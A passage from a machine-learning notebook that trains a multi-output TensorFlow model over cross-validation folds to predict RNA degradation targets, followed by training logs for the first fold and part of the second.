valid_ds = get_dataset(x_valid, y_valid, w_valid, labeled=True, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
oof_ds = get_dataset(get_features_dict(train, feature_cols, encoder_list, valid_idx), labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
test_public_ds = get_dataset(x_test_public, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
test_private_ds = get_dataset(x_test_private, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
# Create clean and noisy datasets
normal_idxs = np.intersect1d(train[train['augmented'] == False].index, train_idx)
x_train_normal = get_features_dict(train, feature_cols, encoder_list, normal_idxs)
y_train_normal = get_targets_dict(train, pred_cols, normal_idxs)
w_train_normal = np.log(train.iloc[normal_idxs]['signal_to_noise'].values+1.2)+1
normal_ds = get_dataset_sampling(x_train_normal, y_train_normal, w_train_normal, labeled=True, shuffled=True,
repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
augmented_idxs = np.intersect1d(train[train['augmented'] == True].index, train_idx)
x_train_augmented = get_features_dict(train, feature_cols, encoder_list, augmented_idxs)
y_train_augmented = get_targets_dict(train, pred_cols, augmented_idxs)
w_train_augmented = np.log(train.iloc[augmented_idxs]['signal_to_noise'].values+1.2)+1
augmented_ds = get_dataset_sampling(x_train_augmented, y_train_augmented, w_train_augmented, labeled=True, shuffled=True,
repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
# Resampled TF Dataset
resampled_ds = tf.data.experimental.sample_from_datasets([normal_ds, augmented_ds], weights=[.5, .5])
resampled_ds = resampled_ds.batch(config['BATCH_SIZE']).prefetch(AUTO)
### Model
K.clear_session()
model = model_fn()
model_path = f'model_{fold}.h5'
es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], restore_best_weights=True, verbose=1)
rlrp = ReduceLROnPlateau(monitor='val_loss', mode='min', factor=0.1, patience=5, verbose=1)
### Train
history = model.fit(resampled_ds,
validation_data=valid_ds,
callbacks=[es, rlrp],
epochs=config['EPOCHS'],
batch_size=config['BATCH_SIZE'],
steps_per_epoch=int(len(normal_idxs)//(config['BATCH_SIZE']* .5)),
verbose=2).history
history_list.append(history)
# Save last model weights
model.save_weights(model_path)
### Inference
oof_ds_preds = np.array(model.predict(oof_ds)).reshape((len(pred_cols), len(valid_idx), 68)).transpose((1, 2, 0))
oof_preds[valid_idx] = oof_ds_preds
# Short sequence (public test)
model = model_fn(pred_len=config['PB_SEQ_LEN'])
model.load_weights(model_path)
test_public_ds_preds = np.array(model.predict(test_public_ds)).reshape((len(pred_cols), len(public_test),
config['PB_SEQ_LEN'])).transpose((1, 2, 0))
test_public_preds += test_public_ds_preds * (1 / config['N_USED_FOLDS'])
# Long sequence (private test)
model = model_fn(pred_len=config['PV_SEQ_LEN'])
model.load_weights(model_path)
test_private_ds_preds = np.array(model.predict(test_private_ds)).reshape((len(pred_cols), len(private_test),
config['PV_SEQ_LEN'])).transpose((1, 2, 0))
test_private_preds += test_private_ds_preds * (1 / config['N_USED_FOLDS'])
###Output
FOLD: 1
Epoch 1/70
120/120 - 9s - loss: 8.8397 - output_react_loss: 0.9259 - output_bg_ph_loss: 1.1574 - output_ph_loss: 1.3049 - output_mg_c_loss: 1.1250 - output_c_loss: 1.1182 - val_loss: 6.6835 - val_output_react_loss: 0.7664 - val_output_bg_ph_loss: 0.9430 - val_output_ph_loss: 0.8700 - val_output_mg_c_loss: 0.8241 - val_output_c_loss: 0.7464
Epoch 2/70
120/120 - 7s - loss: 7.6376 - output_react_loss: 0.8081 - output_bg_ph_loss: 0.9683 - output_ph_loss: 1.1501 - output_mg_c_loss: 0.9694 - output_c_loss: 0.9957 - val_loss: 6.0817 - val_output_react_loss: 0.6944 - val_output_bg_ph_loss: 0.8665 - val_output_ph_loss: 0.8055 - val_output_mg_c_loss: 0.7370 - val_output_c_loss: 0.6802
Epoch 3/70
120/120 - 7s - loss: 7.1648 - output_react_loss: 0.7737 - output_bg_ph_loss: 0.9002 - output_ph_loss: 1.1059 - output_mg_c_loss: 0.8889 - output_c_loss: 0.9332 - val_loss: 5.6689 - val_output_react_loss: 0.6572 - val_output_bg_ph_loss: 0.8071 - val_output_ph_loss: 0.7491 - val_output_mg_c_loss: 0.6815 - val_output_c_loss: 0.6283
Epoch 4/70
120/120 - 7s - loss: 6.6211 - output_react_loss: 0.7340 - output_bg_ph_loss: 0.8261 - output_ph_loss: 1.0016 - output_mg_c_loss: 0.8152 - output_c_loss: 0.8689 - val_loss: 5.4716 - val_output_react_loss: 0.6421 - val_output_bg_ph_loss: 0.7689 - val_output_ph_loss: 0.7378 - val_output_mg_c_loss: 0.6485 - val_output_c_loss: 0.6149
Epoch 5/70
120/120 - 7s - loss: 6.4536 - output_react_loss: 0.7158 - output_bg_ph_loss: 0.8024 - output_ph_loss: 0.9987 - output_mg_c_loss: 0.7880 - output_c_loss: 0.8425 - val_loss: 5.3014 - val_output_react_loss: 0.6178 - val_output_bg_ph_loss: 0.7454 - val_output_ph_loss: 0.7235 - val_output_mg_c_loss: 0.6300 - val_output_c_loss: 0.5915
Epoch 6/70
120/120 - 7s - loss: 6.1134 - output_react_loss: 0.6714 - output_bg_ph_loss: 0.7681 - output_ph_loss: 0.9380 - output_mg_c_loss: 0.7443 - output_c_loss: 0.8078 - val_loss: 5.1079 - val_output_react_loss: 0.5890 - val_output_bg_ph_loss: 0.7184 - val_output_ph_loss: 0.6878 - val_output_mg_c_loss: 0.6115 - val_output_c_loss: 0.5824
Epoch 7/70
120/120 - 7s - loss: 5.9865 - output_react_loss: 0.6653 - output_bg_ph_loss: 0.7482 - output_ph_loss: 0.9160 - output_mg_c_loss: 0.7237 - output_c_loss: 0.7961 - val_loss: 5.0390 - val_output_react_loss: 0.5902 - val_output_bg_ph_loss: 0.7151 - val_output_ph_loss: 0.6802 - val_output_mg_c_loss: 0.5866 - val_output_c_loss: 0.5750
Epoch 8/70
120/120 - 7s - loss: 5.8787 - output_react_loss: 0.6528 - output_bg_ph_loss: 0.7308 - output_ph_loss: 0.9134 - output_mg_c_loss: 0.7059 - output_c_loss: 0.7861 - val_loss: 4.9266 - val_output_react_loss: 0.5709 - val_output_bg_ph_loss: 0.7068 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5758 - val_output_c_loss: 0.5577
Epoch 9/70
120/120 - 7s - loss: 5.8656 - output_react_loss: 0.6562 - output_bg_ph_loss: 0.7181 - output_ph_loss: 0.9100 - output_mg_c_loss: 0.7022 - output_c_loss: 0.8025 - val_loss: 4.9422 - val_output_react_loss: 0.5764 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6640 - val_output_mg_c_loss: 0.5782 - val_output_c_loss: 0.5650
Epoch 10/70
120/120 - 7s - loss: 5.7170 - output_react_loss: 0.6373 - output_bg_ph_loss: 0.7020 - output_ph_loss: 0.8879 - output_mg_c_loss: 0.6831 - output_c_loss: 0.7843 - val_loss: 4.8992 - val_output_react_loss: 0.5714 - val_output_bg_ph_loss: 0.6902 - val_output_ph_loss: 0.6615 - val_output_mg_c_loss: 0.5746 - val_output_c_loss: 0.5652
Epoch 11/70
120/120 - 7s - loss: 5.3053 - output_react_loss: 0.5975 - output_bg_ph_loss: 0.6579 - output_ph_loss: 0.8233 - output_mg_c_loss: 0.6250 - output_c_loss: 0.7213 - val_loss: 4.8023 - val_output_react_loss: 0.5606 - val_output_bg_ph_loss: 0.6868 - val_output_ph_loss: 0.6482 - val_output_mg_c_loss: 0.5583 - val_output_c_loss: 0.5427
Epoch 12/70
120/120 - 7s - loss: 5.5135 - output_react_loss: 0.6187 - output_bg_ph_loss: 0.6695 - output_ph_loss: 0.8676 - output_mg_c_loss: 0.6550 - output_c_loss: 0.7598 - val_loss: 4.7526 - val_output_react_loss: 0.5582 - val_output_bg_ph_loss: 0.6705 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5555 - val_output_c_loss: 0.5471
Epoch 13/70
120/120 - 7s - loss: 5.2029 - output_react_loss: 0.5775 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8221 - output_mg_c_loss: 0.6133 - output_c_loss: 0.7198 - val_loss: 4.7717 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6807 - val_output_ph_loss: 0.6389 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5438
Epoch 14/70
120/120 - 7s - loss: 5.2533 - output_react_loss: 0.5847 - output_bg_ph_loss: 0.6349 - output_ph_loss: 0.8446 - output_mg_c_loss: 0.6162 - output_c_loss: 0.7371 - val_loss: 4.7730 - val_output_react_loss: 0.5559 - val_output_bg_ph_loss: 0.6747 - val_output_ph_loss: 0.6340 - val_output_mg_c_loss: 0.5644 - val_output_c_loss: 0.5489
Epoch 15/70
120/120 - 7s - loss: 5.0608 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6109 - output_ph_loss: 0.8029 - output_mg_c_loss: 0.5952 - output_c_loss: 0.7100 - val_loss: 4.7315 - val_output_react_loss: 0.5479 - val_output_bg_ph_loss: 0.6692 - val_output_ph_loss: 0.6356 - val_output_mg_c_loss: 0.5578 - val_output_c_loss: 0.5461
Epoch 16/70
120/120 - 7s - loss: 5.0519 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6056 - output_ph_loss: 0.8057 - output_mg_c_loss: 0.5897 - output_c_loss: 0.7197 - val_loss: 4.7195 - val_output_react_loss: 0.5459 - val_output_bg_ph_loss: 0.6713 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5420
Epoch 17/70
120/120 - 7s - loss: 4.9197 - output_react_loss: 0.5442 - output_bg_ph_loss: 0.5949 - output_ph_loss: 0.7841 - output_mg_c_loss: 0.5771 - output_c_loss: 0.7033 - val_loss: 4.7081 - val_output_react_loss: 0.5398 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6330 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5494
Epoch 18/70
120/120 - 7s - loss: 4.8407 - output_react_loss: 0.5387 - output_bg_ph_loss: 0.5863 - output_ph_loss: 0.7697 - output_mg_c_loss: 0.5651 - output_c_loss: 0.6909 - val_loss: 4.7479 - val_output_react_loss: 0.5473 - val_output_bg_ph_loss: 0.6786 - val_output_ph_loss: 0.6390 - val_output_mg_c_loss: 0.5585 - val_output_c_loss: 0.5402
Epoch 19/70
120/120 - 7s - loss: 4.9427 - output_react_loss: 0.5432 - output_bg_ph_loss: 0.5823 - output_ph_loss: 0.8134 - output_mg_c_loss: 0.5743 - output_c_loss: 0.7299 - val_loss: 4.6847 - val_output_react_loss: 0.5418 - val_output_bg_ph_loss: 0.6676 - val_output_ph_loss: 0.6277 - val_output_mg_c_loss: 0.5495 - val_output_c_loss: 0.5391
Epoch 20/70
120/120 - 7s - loss: 4.7518 - output_react_loss: 0.5295 - output_bg_ph_loss: 0.5623 - output_ph_loss: 0.7691 - output_mg_c_loss: 0.5556 - output_c_loss: 0.6880 - val_loss: 4.6505 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6606 - val_output_ph_loss: 0.6247 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5354
Epoch 21/70
120/120 - 7s - loss: 4.5799 - output_react_loss: 0.5129 - output_bg_ph_loss: 0.5427 - output_ph_loss: 0.7412 - output_mg_c_loss: 0.5302 - output_c_loss: 0.6670 - val_loss: 4.6555 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6600 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5457 - val_output_c_loss: 0.5435
Epoch 22/70
120/120 - 7s - loss: 4.6793 - output_react_loss: 0.5103 - output_bg_ph_loss: 0.5511 - output_ph_loss: 0.7675 - output_mg_c_loss: 0.5492 - output_c_loss: 0.6907 - val_loss: 4.6583 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6578 - val_output_ph_loss: 0.6263 - val_output_mg_c_loss: 0.5486 - val_output_c_loss: 0.5399
Epoch 23/70
120/120 - 7s - loss: 4.7231 - output_react_loss: 0.5174 - output_bg_ph_loss: 0.5518 - output_ph_loss: 0.7815 - output_mg_c_loss: 0.5493 - output_c_loss: 0.7045 - val_loss: 4.6738 - val_output_react_loss: 0.5383 - val_output_bg_ph_loss: 0.6693 - val_output_ph_loss: 0.6249 - val_output_mg_c_loss: 0.5477 - val_output_c_loss: 0.5383
Epoch 24/70
120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4920 - output_bg_ph_loss: 0.5392 - output_ph_loss: 0.7414 - output_mg_c_loss: 0.5234 - output_c_loss: 0.6726 - val_loss: 4.7325 - val_output_react_loss: 0.5448 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6377 - val_output_mg_c_loss: 0.5582 - val_output_c_loss: 0.5427
Epoch 25/70
Epoch 00025: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.3904 - output_react_loss: 0.4821 - output_bg_ph_loss: 0.5178 - output_ph_loss: 0.7217 - output_mg_c_loss: 0.5074 - output_c_loss: 0.6540 - val_loss: 4.6522 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6223 - val_output_mg_c_loss: 0.5502 - val_output_c_loss: 0.5329
Epoch 26/70
120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5207 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5257 - output_c_loss: 0.6996 - val_loss: 4.5565 - val_output_react_loss: 0.5271 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5268
Epoch 27/70
120/120 - 7s - loss: 4.1334 - output_react_loss: 0.4538 - output_bg_ph_loss: 0.4856 - output_ph_loss: 0.6847 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6195 - val_loss: 4.5609 - val_output_react_loss: 0.5284 - val_output_bg_ph_loss: 0.6479 - val_output_ph_loss: 0.6152 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5270
Epoch 28/70
120/120 - 7s - loss: 4.2748 - output_react_loss: 0.4703 - output_bg_ph_loss: 0.4885 - output_ph_loss: 0.7147 - output_mg_c_loss: 0.4972 - output_c_loss: 0.6479 - val_loss: 4.5574 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6485 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5260
Epoch 29/70
120/120 - 7s - loss: 4.2394 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4884 - output_ph_loss: 0.7139 - output_mg_c_loss: 0.4878 - output_c_loss: 0.6537 - val_loss: 4.5584 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5334 - val_output_c_loss: 0.5274
Epoch 30/70
120/120 - 7s - loss: 4.2578 - output_react_loss: 0.4595 - output_bg_ph_loss: 0.4945 - output_ph_loss: 0.7195 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6493 - val_loss: 4.5614 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5275
Epoch 31/70
120/120 - 7s - loss: 4.3131 - output_react_loss: 0.4688 - output_bg_ph_loss: 0.4934 - output_ph_loss: 0.7268 - output_mg_c_loss: 0.4992 - output_c_loss: 0.6634 - val_loss: 4.5532 - val_output_react_loss: 0.5268 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5268
Epoch 32/70
120/120 - 7s - loss: 4.1724 - output_react_loss: 0.4482 - output_bg_ph_loss: 0.4822 - output_ph_loss: 0.7072 - output_mg_c_loss: 0.4776 - output_c_loss: 0.6491 - val_loss: 4.5556 - val_output_react_loss: 0.5283 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5266
Epoch 33/70
120/120 - 7s - loss: 4.0777 - output_react_loss: 0.4427 - output_bg_ph_loss: 0.4760 - output_ph_loss: 0.6814 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6219 - val_loss: 4.5641 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5273
Epoch 34/70
120/120 - 8s - loss: 4.2050 - output_react_loss: 0.4552 - output_bg_ph_loss: 0.4826 - output_ph_loss: 0.7076 - output_mg_c_loss: 0.4829 - output_c_loss: 0.6560 - val_loss: 4.5578 - val_output_react_loss: 0.5287 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5279
Epoch 35/70
120/120 - 7s - loss: 4.1196 - output_react_loss: 0.4479 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.6841 - output_mg_c_loss: 0.4790 - output_c_loss: 0.6326 - val_loss: 4.5642 - val_output_react_loss: 0.5291 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6141 - val_output_mg_c_loss: 0.5349 - val_output_c_loss: 0.5277
Epoch 36/70
Epoch 00036: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.1539 - output_react_loss: 0.4543 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.6984 - output_mg_c_loss: 0.4783 - output_c_loss: 0.6424 - val_loss: 4.5608 - val_output_react_loss: 0.5286 - val_output_bg_ph_loss: 0.6470 - val_output_ph_loss: 0.6157 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5269
Epoch 37/70
120/120 - 7s - loss: 4.2010 - output_react_loss: 0.4513 - output_bg_ph_loss: 0.4825 - output_ph_loss: 0.7171 - output_mg_c_loss: 0.4820 - output_c_loss: 0.6524 - val_loss: 4.5544 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6467 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5266
Epoch 38/70
120/120 - 7s - loss: 4.0893 - output_react_loss: 0.4433 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.6860 - output_mg_c_loss: 0.4737 - output_c_loss: 0.6247 - val_loss: 4.5552 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6138 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5267
Epoch 39/70
120/120 - 7s - loss: 4.1813 - output_react_loss: 0.4526 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7089 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6541 - val_loss: 4.5544 - val_output_react_loss: 0.5272 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5268
Epoch 40/70
120/120 - 7s - loss: 4.0733 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4701 - output_ph_loss: 0.6839 - output_mg_c_loss: 0.4650 - output_c_loss: 0.6399 - val_loss: 4.5556 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5272
Epoch 41/70
120/120 - 7s - loss: 4.0894 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.6876 - output_mg_c_loss: 0.4709 - output_c_loss: 0.6341 - val_loss: 4.5525 - val_output_react_loss: 0.5274 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5269
Epoch 42/70
120/120 - 8s - loss: 4.1918 - output_react_loss: 0.4541 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.4842 - output_c_loss: 0.6530 - val_loss: 4.5551 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5271
Epoch 43/70
120/120 - 7s - loss: 4.2285 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4855 - output_ph_loss: 0.7191 - output_mg_c_loss: 0.4849 - output_c_loss: 0.6492 - val_loss: 4.5543 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5270
Epoch 44/70
120/120 - 7s - loss: 3.9389 - output_react_loss: 0.4208 - output_bg_ph_loss: 0.4606 - output_ph_loss: 0.6573 - output_mg_c_loss: 0.4551 - output_c_loss: 0.6086 - val_loss: 4.5547 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5269
Epoch 45/70
120/120 - 7s - loss: 4.1721 - output_react_loss: 0.4503 - output_bg_ph_loss: 0.4780 - output_ph_loss: 0.7018 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6468 - val_loss: 4.5578 - val_output_react_loss: 0.5282 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5272
Epoch 46/70
Epoch 00046: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 4.1766 - output_react_loss: 0.4501 - output_bg_ph_loss: 0.4758 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4777 - output_c_loss: 0.6573 - val_loss: 4.5556 - val_output_react_loss: 0.5279 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5269
Epoch 47/70
120/120 - 7s - loss: 4.1604 - output_react_loss: 0.4493 - output_bg_ph_loss: 0.4744 - output_ph_loss: 0.7118 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6509 - val_loss: 4.5541 - val_output_react_loss: 0.5278 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5268
Epoch 48/70
120/120 - 7s - loss: 4.1509 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4746 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4827 - output_c_loss: 0.6452 - val_loss: 4.5540 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269
Epoch 49/70
120/120 - 7s - loss: 4.1227 - output_react_loss: 0.4461 - output_bg_ph_loss: 0.4759 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4702 - output_c_loss: 0.6421 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5268
Epoch 50/70
120/120 - 7s - loss: 4.1497 - output_react_loss: 0.4514 - output_bg_ph_loss: 0.4761 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4794 - output_c_loss: 0.6394 - val_loss: 4.5538 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269
Epoch 51/70
Restoring model weights from the end of the best epoch.
Epoch 00051: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07.
120/120 - 7s - loss: 4.0692 - output_react_loss: 0.4418 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6387 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5326 - val_output_c_loss: 0.5269
Epoch 00051: early stopping
FOLD: 2
Epoch 1/70
120/120 - 9s - loss: 8.9128 - output_react_loss: 0.9383 - output_bg_ph_loss: 1.1704 - output_ph_loss: 1.3152 - output_mg_c_loss: 1.1295 - output_c_loss: 1.1212 - val_loss: 6.5853 - val_output_react_loss: 0.7624 - val_output_bg_ph_loss: 0.9432 - val_output_ph_loss: 0.8395 - val_output_mg_c_loss: 0.8012 - val_output_c_loss: 0.7321
Epoch 2/70
120/120 - 7s - loss: 7.5912 - output_react_loss: 0.8057 - output_bg_ph_loss: 0.9756 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9677 - output_c_loss: 0.9707 - val_loss: 5.9750 - val_output_react_loss: 0.6882 - val_output_bg_ph_loss: 0.8614 - val_output_ph_loss: 0.7744 - val_output_mg_c_loss: 0.7194 - val_output_c_loss: 0.6625
Epoch 3/70
120/120 - 7s - loss: 7.1064 - output_react_loss: 0.7623 - output_bg_ph_loss: 0.8993 - output_ph_loss: 1.0778 - output_mg_c_loss: 0.8766 - output_c_loss: 0.9522 - val_loss: 5.4677 - val_output_react_loss: 0.6513 - val_output_bg_ph_loss: 0.7812 - val_output_ph_loss: 0.7253 - val_output_mg_c_loss: 0.6417 - val_output_c_loss: 0.5941
Epoch 4/70
120/120 - 7s - loss: 6.7508 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8445 - output_ph_loss: 1.0186 - output_mg_c_loss: 0.8359 - output_c_loss: 0.8961 - val_loss: 5.1992 - val_output_react_loss: 0.6109 - val_output_bg_ph_loss: 0.7467 - val_output_ph_loss: 0.6903 - val_output_mg_c_loss: 0.6108 - val_output_c_loss: 0.5722
Epoch 5/70
120/120 - 7s - loss: 6.5375 - output_react_loss: 0.7160 - output_bg_ph_loss: 0.8198 - output_ph_loss: 0.9891 - output_mg_c_loss: 0.8013 - output_c_loss: 0.8744 - val_loss: 4.9895 - val_output_react_loss: 0.5965 - val_output_bg_ph_loss: 0.7124 - val_output_ph_loss: 0.6590 - val_output_mg_c_loss: 0.5759 - val_output_c_loss: 0.5609
Epoch 6/70
120/120 - 7s - loss: 6.2897 - output_react_loss: 0.6944 - output_bg_ph_loss: 0.7863 - output_ph_loss: 0.9586 - output_mg_c_loss: 0.7666 - output_c_loss: 0.8363 - val_loss: 4.8275 - val_output_react_loss: 0.5699 - val_output_bg_ph_loss: 0.6906 - val_output_ph_loss: 0.6425 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5416
Epoch 7/70
120/120 - 7s - loss: 6.1039 - output_react_loss: 0.6757 - output_bg_ph_loss: 0.7549 - output_ph_loss: 0.9339 - output_mg_c_loss: 0.7382 - output_c_loss: 0.8322 - val_loss: 4.8011 - val_output_react_loss: 0.5680 - val_output_bg_ph_loss: 0.6876 - val_output_ph_loss: 0.6410 - val_output_mg_c_loss: 0.5562 - val_output_c_loss: 0.5364
Epoch 8/70
120/120 - 7s - loss: 6.0208 - output_react_loss: 0.6756 - output_bg_ph_loss: 0.7429 - output_ph_loss: 0.9175 - output_mg_c_loss: 0.7260 - output_c_loss: 0.8144 - val_loss: 4.7141 - val_output_react_loss: 0.5520 - val_output_bg_ph_loss: 0.6756 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5310
Epoch 9/70
120/120 - 7s - loss: 5.6994 - output_react_loss: 0.6325 - output_bg_ph_loss: 0.7093 - output_ph_loss: 0.8825 - output_mg_c_loss: 0.6814 - output_c_loss: 0.7703 - val_loss: 4.6370 - val_output_react_loss: 0.5421 - val_output_bg_ph_loss: 0.6677 - val_output_ph_loss: 0.6186 - val_output_mg_c_loss: 0.5388 - val_output_c_loss: 0.5210
Epoch 10/70
120/120 - 7s - loss: 5.6689 - output_react_loss: 0.6333 - output_bg_ph_loss: 0.7009 - output_ph_loss: 0.8634 - output_mg_c_loss: 0.6764 - output_c_loss: 0.7843 - val_loss: 4.6090 - val_output_react_loss: 0.5307 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6181 - val_output_mg_c_loss: 0.5431 - val_output_c_loss: 0.5205
Epoch 11/70
120/120 - 7s - loss: 5.6520 - output_react_loss: 0.6270 - output_bg_ph_loss: 0.6931 - output_ph_loss: 0.8810 - output_mg_c_loss: 0.6780 - output_c_loss: 0.7747 - val_loss: 4.6214 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6075 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5131
Epoch 12/70
120/120 - 8s - loss: 5.4352 - output_react_loss: 0.6135 - output_bg_ph_loss: 0.6598 - output_ph_loss: 0.8373 - output_mg_c_loss: 0.6389 - output_c_loss: 0.7736 - val_loss: 4.5804 - val_output_react_loss: 0.5245 - val_output_bg_ph_loss: 0.6611 - val_output_ph_loss: 0.6115 - val_output_mg_c_loss: 0.5368 - val_output_c_loss: 0.5240
Epoch 13/70
120/120 - 7s - loss: 5.1948 - output_react_loss: 0.5789 - output_bg_ph_loss: 0.6361 - output_ph_loss: 0.8005 - output_mg_c_loss: 0.6193 - output_c_loss: 0.7260 - val_loss: 4.6597 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6780 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5512 - val_output_c_loss: 0.5173
Epoch 14/70
